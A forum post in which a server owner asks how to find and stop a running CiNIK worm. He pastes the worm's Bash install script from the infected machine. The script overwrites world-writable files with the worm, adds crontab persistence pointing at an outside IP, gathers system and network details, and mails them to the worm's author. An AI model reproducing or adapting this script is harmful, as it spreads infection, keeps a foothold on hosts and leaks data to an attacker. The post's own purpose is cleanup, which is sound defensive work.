Hi Tony.
Thanks a lot for your reply, I read all those links when receive
your mail, but they say how to avoid this to happen, I already
read about how to prevent it, but I can't find how to stop the
worm to work, since the process must be still running but
i don't know how to find it!.
I was reading in what looks like an install script.
well if anyone has some idea of how to find the process and
get rid of it, great!.
i don't understand what will be the var $i ,so it's probably pointing
to the file.
thanks
Leo
---SCRIPT USED BY CINIK variant C to instal itself on the sme---------------
#!/bin/bash
##
## CiNIK starts here
##
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
# ce id am ?
myid=/usr/bin/id | /bin/cut -d\( -f1 | /bin/cut -d= -f2
# punem si intr-un loc default
mkdir -p /tmp/.font-unix/.cinik
cat /tmp/.cinik > /tmp/.font-unix/.cinik/.cinik
chmod a+x /tmp/.font-unix/.cinik/.cinik
echo 1 /bin/date +%H \* \* \* /tmp/.font-unix/.cinik/.cinik 218.223.29.82 \> /dev/null 2\>\&1 | crontab
# ale altora
for i in /usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 2>/dev/null
do
cat /tmp/.cinik > $i
chmod a+x $i
echo 2 /bin/date +%H \* \* \* $i 218.223.29.82 \> /dev/null 2\>\&1 | crontab
done
# directoarele mele
for i in /usr/bin/find /usr /var /tmp /home /mnt -type d -uid $myid
do
cat /tmp/.cinik > $i/.cinik
chmod a+x $i/.cinik
echo 3 /bin/date +%H \* \* \* $i/.cinik 218.223.29.82 \> /dev/null 2\>\&1 | crontab
done
echo PROC > /tmp/.cinik.status
cat /proc/cpuinfo >> /tmp/.cinik.status
echo MEM >> /tmp/.cinik.status
/usr/bin/free >> /tmp/.cinik.status
echo HDD >> /tmp/.cinik.status
/bin/df -h >> /tmp/.cinik.status
echo IP >> /tmp/.cinik.status
/sbin/ifconfig >> /tmp/.cinik.status
myip=/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1
mail cinik_worm@yahoo.com -s "$myip" < /tmp/.cinik.status
rm -f /tmp/.cinik.status
7 Replies
922 Views